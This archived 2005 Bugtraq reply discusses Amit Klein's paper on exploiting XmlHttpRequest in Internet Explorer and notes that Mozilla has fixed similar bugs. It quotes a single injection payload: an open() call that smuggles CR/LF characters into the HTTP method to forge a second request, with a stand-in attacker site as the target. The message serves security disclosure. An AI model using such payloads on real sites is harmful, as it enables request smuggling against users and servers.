lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue, 27 Sep 2005 21:34:11 +0900
From: Yutaka OIWA <y.oiwa@...t.go.jp>
To: bugtraq@...urityfocus.com
Subject: Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit
 Klein


Hello Amit,

"Amit Klein (AKsecurity)" <aksecurity@...pop.com> writes:

>   x.open("GET\thttp://www.target.site/page.cgi?parameters\tHTTP
>   /1.0\r\nHost:\twww.target.site\r\nReferer:\thttp://www.target
>   .site/somepath?somequery\r\n\r\nGET\thttp://nosuchhost/\tHTTP
>   /1.0\r\nFoobar:","http://www.attacker.site/",false);

This kind of bugs are already fixed in recent Mozilla browsers,
as shown in your reference [4].

> [4] "setRequestHeader can be exploited using newline characters", 
> Bugzilla bug 297078
> https://bugzilla.mozilla.org/show_bug.cgi?id=297078 and 
> "XMLHttpRequest allows dangerous request headers to be set", 
> Bugzilla bug 302263
> https://bugzilla.mozilla.org/show_bug.cgi?id=302263

see comment #15 of bug 297078.

https://bugzilla.mozilla.org/show_bug.cgi?id=297078#c15

-- 
Yutaka OIWA                        Research Center for Information Security
    National Institute of Advanced Industrial Science and Technology (AIST)
                      Mail addresses: <y.oiwa@...t.go.jp>, <yutaka@...a.jp>
OpenPGP: id[995DD3E1] fp[3C21 17D0 D953 77D3 02D7 4FEC 4754 40C1 995D D3E1]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ